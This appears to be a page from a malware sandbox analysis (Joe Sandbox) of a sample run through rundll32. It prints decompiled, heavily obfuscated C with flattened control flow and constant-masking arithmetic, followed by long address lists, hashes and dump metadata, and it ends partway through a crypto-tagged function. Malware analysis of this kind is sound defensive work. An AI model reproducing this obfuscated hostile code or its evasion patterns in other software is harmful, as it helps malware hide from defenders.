				_t851 = 0x53;
				_v2796 = _v2796 / _t851;
				_v2796 = _v2796 + 0x7bc9;
				_v2796 = _v2796 ^ 0x00042e34;
				_v2688 = 0xf8ab78;
				_t852 = 0x3c;
				_v2688 = _v2688 * 0x22;
				_v2688 = _v2688 ^ 0x21025542;
				_v2696 = 0x9e8755;
				_v2696 = _v2696 + 0xe3ef;
				_v2696 = _v2696 ^ 0x00960058;
				_v2792 = 0x415dac;
				_v2792 = _v2792 >> 1;
				_v2792 = _v2792 + 0xffffd338;
				_v2792 = _v2792 ^ 0x002ca457;
				_v2704 = 0xb8f6ce;
				_v2704 = _v2704 + 0xffff4ac5;
				_v2704 = _v2704 ^ 0x00b9d8ec;
				_v2860 = 0x12dd79;
				_v2860 = _v2860 ^ 0x144e403a;
				_v2860 = _v2860 / _t852;
				_v2860 = _v2860 ^ 0x93d5fcb7;
				_v2860 = _v2860 ^ 0x93828b4c;
				_v2868 = 0x481259;
				_v2868 = _v2868 ^ 0xea83c1db;
				_v2868 = _v2868 + 0xffff22f6;
				_v2868 = _v2868 | 0xf9bd7925;
				_v2868 = _v2868 ^ 0xfbfe4ce9;
				_v2740 = 0xefe715;
				_v2740 = _v2740 << 7;
				_v2740 = _v2740 >> 5;
				_v2740 = _v2740 ^ 0x03bc65a1;
				_v2748 = 0x39cd9f;
				_v2748 = _v2748 * 0x16;
				_v2748 = _v2748 + 0xefc3;
				_v2748 = _v2748 ^ 0x04f9debc;
				_t797 = E002C8FD2(_t852);
				_t930 = _v2736;
				_t830 = _t797;
				while(1) {
					L1:
					_t798 = 0x7e670bc;
					do {
						while(1) {
							L2:
							_t945 = _t931 - 0x7d4716d;
							if(_t945 > 0) {
								break;
							}
							if(_t945 == 0) {
								_t858 = _v2848;
								E002B68DE(_t858, _v2872, _v2852, _v2796, _t930);
								_t937 =  &(_t937[3]);
								_t931 = 0x97d4d6b;
								while(1) {
									L1:
									_t798 = 0x7e670bc;
									goto L2;
								}
							} else {
								if(_t931 == 0x9f9f0c) {
									_v2612 = E002D13A6();
									_v2608 = 2 + E002CBA68(_v2716, _v2812, _v2660, _t808, _v2744) * 2;
									_t858 = _t830;
									_t812 = E002B5EB5(_t858, _v2912, _t830, _v2752,  &_v2616, _v2700, _v2652, _v2804, _v2708, _t830, _v2716, _v2716, _v2636, _v2772);
									_t937 =  &(_t937[0xf]);
									__eflags = _t812;
									if(__eflags != 0) {
										_t931 = 0xaab8dea;
										while(1) {
											L1:
											_t798 = 0x7e670bc;
											goto L2;
										}
									}
								} else {
									if(_t931 == 0x1e136d2) {
										_push(_v2656);
										_push(_v2836);
										_push(_v2764);
										_push(0);
										_push(0);
										_push(_v2828);
										_push(_t858);
										_push(1);
										_t858 =  &_v1044;
										E002B9700(_t858, _v2780, __eflags);
										_t937 =  &(_t937[8]);
										_t931 = 0x7d4716d;
										while(1) {
											L1:
											_t798 = 0x7e670bc;
											goto L2;
										}
									} else {
										if(_t931 == 0x2dbd64b) {
											return E002C4DAD(_v2860, _v2868, _v2616, _v2740, _v2748);
										}
										if(_t931 == 0x63d9dbc) {
											_push(_t858);
											E002BEA7B( &_v524, _v2788, _v2888, _t858, _v2844, _v2920, _v2864);
											_t937 =  &(_t937[7]);
											_t931 = 0xc6ce6ce;
											while(1) {
												L1:
												_t798 = 0x7e670bc;
												goto L2;
											}
										} else {
											if(_t931 != 0x7253c5e) {
												goto L24;
											} else {
												_t858 = _v2760;
												_t930 = E002CC9A9(_v2928, _v2896, _v2624, _v2724, _v2620);
												_t937 =  &(_t937[4]);
												_t798 = 0x7e670bc;
												_t931 =  !=  ? 0x7e670bc : 0x97d4d6b;
												continue;
											}
										}
									}
									L28:
								}
							}
							L27:
							return _t812;
							goto L28;
						}
						__eflags = _t931 - _t798;
						if(__eflags == 0) {
							_push(_v2784);
							_push(_v2680);
							_push(0x2b190c);
							E002CD37B(E002BAB66(_v2672, _v2776, __eflags), __eflags, _v2664, _t930, _v2672, _v2892,  &_v524,  &_v1044,  &_v2604, _v2768);
							E002BAE03(_v2736, _v2756, _v2876, _t799);
							_t937 =  &(_t937[0xd]);
							_t931 = 0x1e136d2;
							_t798 = 0x7e670bc;
							goto L24;
						} else {
							__eflags = _t931 - 0x97d4d6b;
							if(_t931 == 0x97d4d6b) {
								E002B68DE(_v2688, _v2696, _v2792, _v2704, _v2624);
								_t937 =  &(_t937[3]);
								_t931 = 0x2dbd64b;
								goto L1;
							} else {
								__eflags = _t931 - 0xaab8dea;
								if(_t931 == 0xaab8dea) {
									E002B777B(_v2712,  &_v2624,  &_v2616, _v2800, _v2900, _v2720);
									_t937 =  &(_t937[4]);
									asm("sbb esi, esi");
									_t931 = (_t931 & 0x04496613) + 0x2dbd64b;
									while(1) {
										L1:
										_t798 = 0x7e670bc;
										goto L2;
									}
								} else {
									__eflags = _t931 - 0xc6ce6ce;
									if(__eflags != 0) {
										goto L24;
									} else {
										E002D12A8(_t858, _v2628, __eflags, _v2880, _v2904,  &_v2084);
										 *((short*)(E002C4FA8(_v2632,  &_v2084, _v2692, _v2840))) = 0;
										E002B8650(_v2684,  &_v1564, __eflags, _v2832);
										_push(_v2640);
										_push(_v2676);
										_push(0x2b181c);
										E002BE7CE(E002BAB66(_v2932, _v2940, __eflags), __eflags, _v2816,  &_v2084, _v2932, _v2644, _v2668, _v2824, _v2648,  &_v1564);
										E002BAE03(_v2916, _v2728, _v2924, _t825);
										_t858 = _v2856;
										_t812 = E002CC38F(_t858,  &_v2604, _t936, _v2908);
										_t937 =  &(_t937[0x15]);
										__eflags = _t812;
										if(__eflags != 0) {
											_t931 = 0x9f9f0c;
											while(1) {
												L1:
												_t798 = 0x7e670bc;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t931 - 0xd142a7e;
					} while (__eflags != 0);
					return _t798;
				}
			}



























































































































                                                                                                                      0x002b472e
                                                                                                                      0x002b4734
                                                                                                                      0x002b473e
                                                                                                                      0x002b474f
                                                                                                                      0x002b4753
                                                                                                                      0x002b475a
                                                                                                                      0x002b4761
                                                                                                                      0x002b4764
                                                                                                                      0x002b4768
                                                                                                                      0x002b4770
                                                                                                                      0x002b477b
                                                                                                                      0x002b4783
                                                                                                                      0x002b478e
                                                                                                                      0x002b4796
                                                                                                                      0x002b479e
                                                                                                                      0x002b47a3
                                                                                                                      0x002b47ab
                                                                                                                      0x002b47b3
                                                                                                                      0x002b47be
                                                                                                                      0x002b47c6
                                                                                                                      0x002b47d1
                                                                                                                      0x002b47dc
                                                                                                                      0x002b47e7
                                                                                                                      0x002b47ef
                                                                                                                      0x002b47fa
                                                                                                                      0x002b4805
                                                                                                                      0x002b480d
                                                                                                                      0x002b4815
                                                                                                                      0x002b481a
                                                                                                                      0x002b4822
                                                                                                                      0x002b4832
                                                                                                                      0x002b4836
                                                                                                                      0x002b483b
                                                                                                                      0x002b4843
                                                                                                                      0x002b484b
                                                                                                                      0x002b4853
                                                                                                                      0x002b4858
                                                                                                                      0x002b4865
                                                                                                                      0x002b4868
                                                                                                                      0x002b486c
                                                                                                                      0x002b4874
                                                                                                                      0x002b488a
                                                                                                                      0x002b4891
                                                                                                                      0x002b489c
                                                                                                                      0x002b48a4
                                                                                                                      0x002b48ad
                                                                                                                      0x002b48b2
                                                                                                                      0x002b48b8
                                                                                                                      0x002b48c0
                                                                                                                      0x002b48c8
                                                                                                                      0x002b48d4
                                                                                                                      0x002b48d7
                                                                                                                      0x002b48db
                                                                                                                      0x002b48e0
                                                                                                                      0x002b48e8
                                                                                                                      0x002b48f0
                                                                                                                      0x002b48fb
                                                                                                                      0x002b4906
                                                                                                                      0x002b4911
                                                                                                                      0x002b491c
                                                                                                                      0x002b4926
                                                                                                                      0x002b4931
                                                                                                                      0x002b4939
                                                                                                                      0x002b493e
                                                                                                                      0x002b4943
                                                                                                                      0x002b494b
                                                                                                                      0x002b4956
                                                                                                                      0x002b4961
                                                                                                                      0x002b496c
                                                                                                                      0x002b497b
                                                                                                                      0x002b497e
                                                                                                                      0x002b4985
                                                                                                                      0x002b4990
                                                                                                                      0x002b499b
                                                                                                                      0x002b49a3
                                                                                                                      0x002b49a8
                                                                                                                      0x002b49b0
                                                                                                                      0x002b49b8
                                                                                                                      0x002b49c0
                                                                                                                      0x002b49c8
                                                                                                                      0x002b49d0
                                                                                                                      0x002b49d5
                                                                                                                      0x002b49dd
                                                                                                                      0x002b49e5
                                                                                                                      0x002b49f0
                                                                                                                      0x002b49f8
                                                                                                                      0x002b4a03
                                                                                                                      0x002b4a16
                                                                                                                      0x002b4a1d
                                                                                                                      0x002b4a28
                                                                                                                      0x002b4a33
                                                                                                                      0x002b4a3e
                                                                                                                      0x002b4a49
                                                                                                                      0x002b4a54
                                                                                                                      0x002b4a5f
                                                                                                                      0x002b4a67
                                                                                                                      0x002b4a72
                                                                                                                      0x002b4a7d
                                                                                                                      0x002b4a88
                                                                                                                      0x002b4a93
                                                                                                                      0x002b4a9e
                                                                                                                      0x002b4aa9
                                                                                                                      0x002b4ab4
                                                                                                                      0x002b4abf
                                                                                                                      0x002b4ad2
                                                                                                                      0x002b4ad9
                                                                                                                      0x002b4ae4
                                                                                                                      0x002b4aec
                                                                                                                      0x002b4af9
                                                                                                                      0x002b4b02
                                                                                                                      0x002b4b03
                                                                                                                      0x002b4b07
                                                                                                                      0x002b4b0f
                                                                                                                      0x002b4b1a
                                                                                                                      0x002b4b22
                                                                                                                      0x002b4b2d
                                                                                                                      0x002b4b3a
                                                                                                                      0x002b4b3e
                                                                                                                      0x002b4b43
                                                                                                                      0x002b4b4b
                                                                                                                      0x002b4b53
                                                                                                                      0x002b4b61
                                                                                                                      0x002b4b65
                                                                                                                      0x002b4b6d
                                                                                                                      0x002b4b75
                                                                                                                      0x002b4b7d
                                                                                                                      0x002b4b82
                                                                                                                      0x002b4b8a
                                                                                                                      0x002b4b94
                                                                                                                      0x002b4b9c
                                                                                                                      0x002b4bb0
                                                                                                                      0x002b4bb5
                                                                                                                      0x002b4bbc
                                                                                                                      0x002b4bc7
                                                                                                                      0x002b4bdc
                                                                                                                      0x002b4bee
                                                                                                                      0x002b4bf5
                                                                                                                      0x002b4c00
                                                                                                                      0x002b4c0b
                                                                                                                      0x002b4c12
                                                                                                                      0x002b4c1d
                                                                                                                      0x002b4c2f
                                                                                                                      0x002b4c34
                                                                                                                      0x002b4c3d
                                                                                                                      0x002b4c48
                                                                                                                      0x002b4c53
                                                                                                                      0x002b4c65
                                                                                                                      0x002b4c68
                                                                                                                      0x002b4c6f
                                                                                                                      0x002b4c7a
                                                                                                                      0x002b4c85
                                                                                                                      0x002b4c90
                                                                                                                      0x002b4c98
                                                                                                                      0x002b4ca3
                                                                                                                      0x002b4cab
                                                                                                                      0x002b4cb0
                                                                                                                      0x002b4cb8
                                                                                                                      0x002b4cc0
                                                                                                                      0x002b4cc8
                                                                                                                      0x002b4cdb
                                                                                                                      0x002b4cea
                                                                                                                      0x002b4cf1
                                                                                                                      0x002b4cfc
                                                                                                                      0x002b4d0f
                                                                                                                      0x002b4d16
                                                                                                                      0x002b4d21
                                                                                                                      0x002b4d2c
                                                                                                                      0x002b4d34
                                                                                                                      0x002b4d3c
                                                                                                                      0x002b4d47
                                                                                                                      0x002b4d52
                                                                                                                      0x002b4d5d
                                                                                                                      0x002b4d68
                                                                                                                      0x002b4d73
                                                                                                                      0x002b4d7e
                                                                                                                      0x002b4d89
                                                                                                                      0x002b4d94
                                                                                                                      0x002b4d9f
                                                                                                                      0x002b4daa
                                                                                                                      0x002b4db5
                                                                                                                      0x002b4dc0
                                                                                                                      0x002b4dcb
                                                                                                                      0x002b4dd6
                                                                                                                      0x002b4dde
                                                                                                                      0x002b4de6
                                                                                                                      0x002b4df1
                                                                                                                      0x002b4df9
                                                                                                                      0x002b4e06
                                                                                                                      0x002b4e0b
                                                                                                                      0x002b4e11
                                                                                                                      0x002b4e19
                                                                                                                      0x002b4e21
                                                                                                                      0x002b4e2c
                                                                                                                      0x002b4e34
                                                                                                                      0x002b4e3f
                                                                                                                      0x002b4e4a
                                                                                                                      0x002b4e5c
                                                                                                                      0x002b4e61
                                                                                                                      0x002b4e6a
                                                                                                                      0x002b4e75
                                                                                                                      0x002b4e7d
                                                                                                                      0x002b4e86
                                                                                                                      0x002b4e8b
                                                                                                                      0x002b4e96
                                                                                                                      0x002b4e97
                                                                                                                      0x002b4e9b
                                                                                                                      0x002b4ea3
                                                                                                                      0x002b4eab
                                                                                                                      0x002b4eb3
                                                                                                                      0x002b4ebb
                                                                                                                      0x002b4ec3
                                                                                                                      0x002b4ecb
                                                                                                                      0x002b4ed6
                                                                                                                      0x002b4ee1
                                                                                                                      0x002b4eec
                                                                                                                      0x002b4ef7
                                                                                                                      0x002b4f02
                                                                                                                      0x002b4f0d
                                                                                                                      0x002b4f20
                                                                                                                      0x002b4f27
                                                                                                                      0x002b4f32
                                                                                                                      0x002b4f3d
                                                                                                                      0x002b4f48
                                                                                                                      0x002b4f53
                                                                                                                      0x002b4f5e
                                                                                                                      0x002b4f72
                                                                                                                      0x002b4f79
                                                                                                                      0x002b4f84
                                                                                                                      0x002b4f8f
                                                                                                                      0x002b4f97
                                                                                                                      0x002b4f9c
                                                                                                                      0x002b4fa1
                                                                                                                      0x002b4fa9
                                                                                                                      0x002b4fb1
                                                                                                                      0x002b4fbc
                                                                                                                      0x002b4fc7
                                                                                                                      0x002b4fd2
                                                                                                                      0x002b4fdf
                                                                                                                      0x002b4fe8
                                                                                                                      0x002b4fec
                                                                                                                      0x002b4ff4
                                                                                                                      0x002b4ffc
                                                                                                                      0x002b500f
                                                                                                                      0x002b501e
                                                                                                                      0x002b5025
                                                                                                                      0x002b5030
                                                                                                                      0x002b503b
                                                                                                                      0x002b5046
                                                                                                                      0x002b5051
                                                                                                                      0x002b505e
                                                                                                                      0x002b5072
                                                                                                                      0x002b5077
                                                                                                                      0x002b5080
                                                                                                                      0x002b508b
                                                                                                                      0x002b5093
                                                                                                                      0x002b509b
                                                                                                                      0x002b50a8
                                                                                                                      0x002b50ab
                                                                                                                      0x002b50af
                                                                                                                      0x002b50b7
                                                                                                                      0x002b50c2
                                                                                                                      0x002b50cd
                                                                                                                      0x002b50d8
                                                                                                                      0x002b50e3
                                                                                                                      0x002b50ee
                                                                                                                      0x002b50f6
                                                                                                                      0x002b5101
                                                                                                                      0x002b510c
                                                                                                                      0x002b5117
                                                                                                                      0x002b512d
                                                                                                                      0x002b5134
                                                                                                                      0x002b513f
                                                                                                                      0x002b5147
                                                                                                                      0x002b514f
                                                                                                                      0x002b5154
                                                                                                                      0x002b515c
                                                                                                                      0x002b516e
                                                                                                                      0x002b5173
                                                                                                                      0x002b517c
                                                                                                                      0x002b5187
                                                                                                                      0x002b5194
                                                                                                                      0x002b5197
                                                                                                                      0x002b519b
                                                                                                                      0x002b51a3
                                                                                                                      0x002b51ab
                                                                                                                      0x002b51bb
                                                                                                                      0x002b51bf
                                                                                                                      0x002b51c7
                                                                                                                      0x002b51cc
                                                                                                                      0x002b51d2
                                                                                                                      0x002b51da
                                                                                                                      0x002b51e2
                                                                                                                      0x002b51ee
                                                                                                                      0x002b51f3
                                                                                                                      0x002b51f9
                                                                                                                      0x002b5201
                                                                                                                      0x002b5213
                                                                                                                      0x002b5216
                                                                                                                      0x002b521d
                                                                                                                      0x002b5228
                                                                                                                      0x002b5235
                                                                                                                      0x002b524a
                                                                                                                      0x002b524b
                                                                                                                      0x002b5252
                                                                                                                      0x002b525d
                                                                                                                      0x002b5268
                                                                                                                      0x002b5273
                                                                                                                      0x002b527e
                                                                                                                      0x002b5289
                                                                                                                      0x002b5290
                                                                                                                      0x002b529b
                                                                                                                      0x002b52a6
                                                                                                                      0x002b52b1
                                                                                                                      0x002b52bc
                                                                                                                      0x002b52c7
                                                                                                                      0x002b52cf
                                                                                                                      0x002b52dd
                                                                                                                      0x002b52e1
                                                                                                                      0x002b52e9
                                                                                                                      0x002b52f1
                                                                                                                      0x002b52f9
                                                                                                                      0x002b5301
                                                                                                                      0x002b5309
                                                                                                                      0x002b5311
                                                                                                                      0x002b5319
                                                                                                                      0x002b5324
                                                                                                                      0x002b532c
                                                                                                                      0x002b5334
                                                                                                                      0x002b533f
                                                                                                                      0x002b5352
                                                                                                                      0x002b5359
                                                                                                                      0x002b5364
                                                                                                                      0x002b537a
                                                                                                                      0x002b537f
                                                                                                                      0x002b5386
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b538d
                                                                                                                      0x002b538d
                                                                                                                      0x002b538d
                                                                                                                      0x002b538d
                                                                                                                      0x002b5393
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b5399
                                                                                                                      0x002b5545
                                                                                                                      0x002b5549
                                                                                                                      0x002b554e
                                                                                                                      0x002b5551
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b539f
                                                                                                                      0x002b53a5
                                                                                                                      0x002b54a5
                                                                                                                      0x002b54d8
                                                                                                                      0x002b54f7
                                                                                                                      0x002b551b
                                                                                                                      0x002b5520
                                                                                                                      0x002b5523
                                                                                                                      0x002b5525
                                                                                                                      0x002b552b
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b53ab
                                                                                                                      0x002b53b1
                                                                                                                      0x002b544b
                                                                                                                      0x002b5452
                                                                                                                      0x002b5456
                                                                                                                      0x002b545d
                                                                                                                      0x002b545f
                                                                                                                      0x002b5461
                                                                                                                      0x002b546f
                                                                                                                      0x002b5470
                                                                                                                      0x002b5472
                                                                                                                      0x002b5479
                                                                                                                      0x002b547e
                                                                                                                      0x002b5481
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b53b7
                                                                                                                      0x002b53bd
                                                                                                                      0x00000000
                                                                                                                      0x002b57c0
                                                                                                                      0x002b53c9
                                                                                                                      0x002b5419
                                                                                                                      0x002b5439
                                                                                                                      0x002b543e
                                                                                                                      0x002b5441
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b53cb
                                                                                                                      0x002b53d1
                                                                                                                      0x00000000
                                                                                                                      0x002b53d7
                                                                                                                      0x002b53f4
                                                                                                                      0x002b5400
                                                                                                                      0x002b5402
                                                                                                                      0x002b540c
                                                                                                                      0x002b5411
                                                                                                                      0x00000000
                                                                                                                      0x002b5411
                                                                                                                      0x002b53d1
                                                                                                                      0x002b53c9
                                                                                                                      0x00000000
                                                                                                                      0x002b53b1
                                                                                                                      0x002b53a5
                                                                                                                      0x002b57cd
                                                                                                                      0x002b57cd
                                                                                                                      0x00000000
                                                                                                                      0x002b57cd
                                                                                                                      0x002b555b
                                                                                                                      0x002b555d
                                                                                                                      0x002b5709
                                                                                                                      0x002b5710
                                                                                                                      0x002b5725
                                                                                                                      0x002b5766
                                                                                                                      0x002b577e
                                                                                                                      0x002b5783
                                                                                                                      0x002b5786
                                                                                                                      0x002b578b
                                                                                                                      0x00000000
                                                                                                                      0x002b5563
                                                                                                                      0x002b5563
                                                                                                                      0x002b5569
                                                                                                                      0x002b56f7
                                                                                                                      0x002b56fc
                                                                                                                      0x002b56ff
                                                                                                                      0x00000000
                                                                                                                      0x002b556f
                                                                                                                      0x002b556f
                                                                                                                      0x002b5575
                                                                                                                      0x002b56b7
                                                                                                                      0x002b56bc
                                                                                                                      0x002b56c1
                                                                                                                      0x002b56c9
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b557b
                                                                                                                      0x002b557b
                                                                                                                      0x002b5581
                                                                                                                      0x00000000
                                                                                                                      0x002b5587
                                                                                                                      0x002b559e
                                                                                                                      0x002b55d4
                                                                                                                      0x002b55de
                                                                                                                      0x002b55e6
                                                                                                                      0x002b55ed
                                                                                                                      0x002b55fc
                                                                                                                      0x002b5648
                                                                                                                      0x002b565d
                                                                                                                      0x002b5666
                                                                                                                      0x002b5675
                                                                                                                      0x002b567a
                                                                                                                      0x002b567d
                                                                                                                      0x002b567f
                                                                                                                      0x002b5685
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x00000000
                                                                                                                      0x002b5388
                                                                                                                      0x002b5388
                                                                                                                      0x002b567f
                                                                                                                      0x002b5581
                                                                                                                      0x002b5575
                                                                                                                      0x002b5569
                                                                                                                      0x00000000
                                                                                                                      0x002b5790
                                                                                                                      0x002b5790
                                                                                                                      0x002b5790
                                                                                                                      0x00000000
                                                                                                                      0x002b538d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &Xbm$'X$04$6R$KO!$X$kM}$kM}$kM}$w3
                                                                                                                      • API String ID: 0-3270913840
                                                                                                                      • Opcode ID: c3e1e34826e4ae0452a8f5d079b8427d3a531a984fe855557324116575347219
                                                                                                                      • Instruction ID: 9901be7d61df2ca4830c859b7332e924b4259590b8d4a42d54ec67287dff8fa7
                                                                                                                      • Opcode Fuzzy Hash: c3e1e34826e4ae0452a8f5d079b8427d3a531a984fe855557324116575347219
                                                                                                                      • Instruction Fuzzy Hash: 1382FF71508380DBD378CF61C98AB9BBBE2BBC4344F10891DE5D99A260D7B59958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C1831 Relevance: 13.1, Strings: 10, Instructions: 639COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002C1831(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				void* __ecx;
				void* _t670;
				void* _t736;
				void* _t738;
				void* _t739;
				intOrPtr _t745;
				void* _t746;
				void* _t749;
				void* _t759;
				void* _t765;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				void* _t789;
				void* _t859;
				signed int _t876;
				void* _t877;
				signed int _t879;
				void* _t880;
				void* _t883;
				void* _t884;
				void* _t885;
				void* _t891;

				_push(_a24);
				_push(_a20);
				_push(0x20);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002BCF25(_t670);
				_v276 = 0xaaffe7;
				_t885 = _t884 + 0x20;
				_t883 = 0;
				_t765 = 0x92c7fbc;
				_t772 = 0x5f;
				_v276 = _v276 * 0x57;
				_v276 = _v276 * 0x22;
				_v276 = _v276 / _t772;
				_v276 = _v276 ^ 0x01ef6b71;
				_v80 = 0xefa32d;
				_v80 = _v80 + 0x395c;
				_v80 = _v80 ^ 0x00efdc89;
				_v208 = 0x14a646;
				_v208 = _v208 ^ 0x03e947f6;
				_t773 = 0x33;
				_v208 = _v208 * 7;
				_v208 = _v208 >> 7;
				_v208 = _v208 ^ 0x0037e257;
				_v108 = 0x55608a;
				_v108 = _v108 ^ 0x27d6d008;
				_v108 = _v108 + 0x510f;
				_v108 = _v108 ^ 0x27840191;
				_v224 = 0xd82d5c;
				_v224 = _v224 | 0x75fffbda;
				_v224 = _v224 + 0xb67d;
				_v224 = _v224 ^ 0x7600b65b;
				_v248 = 0x5f7a1e;
				_v248 = _v248 << 2;
				_v248 = _v248 / _t773;
				_v248 = _v248 << 0xc;
				_v248 = _v248 ^ 0x77d07000;
				_v28 = 0xb2098a;
				_v28 = _v28 ^ 0xa6106b4f;
				_v28 = _v28 ^ 0xa6a262c5;
				_v288 = 0xdf0886;
				_v288 = _v288 ^ 0xb20bba38;
				_v288 = _v288 + 0xffff058c;
				_t774 = 0x55;
				_v288 = _v288 / _t774;
				_v288 = _v288 ^ 0x021a95be;
				_v40 = 0x709b38;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x216e14a0;
				_v128 = 0x325f64;
				_v128 = _v128 | 0xcbf69bed;
				_v128 = _v128 ^ 0x5f1c2ec7;
				_v128 = _v128 ^ 0x94eaf12a;
				_v252 = 0x1f8c2d;
				_v252 = _v252 * 0x26;
				_v252 = _v252 << 9;
				_v252 = _v252 | 0x352a9659;
				_v252 = _v252 ^ 0x7dbfde59;
				_v52 = 0xb64530;
				_v52 = _v52 + 0xffff220f;
				_v52 = _v52 ^ 0x00b5673f;
				_v88 = 0x1eb517;
				_v88 = _v88 + 0x4a10;
				_v88 = _v88 ^ 0x00179ba4;
				_v152 = 0x6dcdd2;
				_v152 = _v152 >> 0xd;
				_v152 = _v152 ^ 0x9b988486;
				_v152 = _v152 ^ 0x9b92820d;
				_v292 = 0x1f7420;
				_v292 = _v292 + 0xffff8acf;
				_v292 = _v292 + 0xbea;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x0ad85b60;
				_v96 = 0xe183f;
				_v96 = _v96 + 0xffffe0b5;
				_v96 = _v96 ^ 0x0006a2b5;
				_v168 = 0xbc531d;
				_v168 = _v168 + 0x1044;
				_v168 = _v168 << 8;
				_v168 = _v168 ^ 0xbc6aad42;
				_v48 = 0xac758b;
				_t775 = 0xa;
				_v48 = _v48 * 0x77;
				_v48 = _v48 ^ 0x5023fd0d;
				_v236 = 0x67d513;
				_v236 = _v236 / _t775;
				_v236 = _v236 | 0x579eaf6c;
				_v236 = _v236 ^ 0x8e50ee8d;
				_v236 = _v236 ^ 0xd9c1be3e;
				_v136 = 0xfa6994;
				_v136 = _v136 | 0x0e19192c;
				_v136 = _v136 >> 8;
				_v136 = _v136 ^ 0x000b81a6;
				_v104 = 0xfa7815;
				_v104 = _v104 + 0xfffffd57;
				_v104 = _v104 | 0xf8b7ad9b;
				_v104 = _v104 ^ 0xf8f20afa;
				_v196 = 0x8e2a42;
				_t776 = 0x1d;
				_v196 = _v196 / _t776;
				_v196 = _v196 + 0xffff8133;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x00494cf1;
				_v284 = 0x1a2960;
				_v284 = _v284 << 7;
				_v284 = _v284 << 1;
				_t777 = 0x7a;
				_v284 = _v284 / _t777;
				_v284 = _v284 ^ 0x00394215;
				_v268 = 0x43d89f;
				_v268 = _v268 + 0xffff7f02;
				_v268 = _v268 * 0x63;
				_v268 = _v268 ^ 0x1173969c;
				_v268 = _v268 ^ 0x0b729cb1;
				_v228 = 0xa5ecf3;
				_v228 = _v228 >> 0xd;
				_v228 = _v228 + 0xffff2d40;
				_v228 = _v228 + 0xffff09c3;
				_v228 = _v228 ^ 0xfffc6095;
				_v160 = 0xb4fa1d;
				_v160 = _v160 * 0x4b;
				_v160 = _v160 >> 0xa;
				_v160 = _v160 ^ 0x0003d5ef;
				_v36 = 0xfd760e;
				_v36 = _v36 | 0xcf12de5e;
				_v36 = _v36 ^ 0xcff8d2d3;
				_v260 = 0x7426f9;
				_v260 = _v260 + 0x2744;
				_v260 = _v260 | 0xa7f1812e;
				_v260 = _v260 >> 0xc;
				_v260 = _v260 ^ 0x0001adb7;
				_v204 = 0x2b40b;
				_t879 = 0x72;
				_v204 = _v204 / _t879;
				_t778 = 0xf;
				_v204 = _v204 / _t778;
				_t779 = 0x79;
				_v204 = _v204 * 0x1e;
				_v204 = _v204 ^ 0x000520e0;
				_v84 = 0xeaa539;
				_v84 = _v84 + 0xffff8f42;
